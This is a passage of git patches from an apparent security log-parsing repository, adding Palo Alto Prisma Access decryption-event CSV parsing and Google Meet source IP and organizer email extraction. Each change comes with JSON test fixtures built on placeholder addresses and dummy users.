"{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:57:01 +0100 Subject: [PATCH 084/150] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-prisma-access/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 8da957210..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:33:29 +0100 Subject: [PATCH 085/150] Google Report: add source.ip and user.email --- Google Cloud/google-report/ingest/parser.yml | 2 + .../google-report/tests/test_end_call.json | 59 +++++++++++++++++++ .../tests/test_end_call_no_ip.json | 44 ++++++++++++++ .../tests/test_meet_sample1.json | 9 ++- 4 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 Google Cloud/google-report/tests/test_end_call.json create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 4213a66c9..a52024ed9 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -161,6 +161,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json @@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 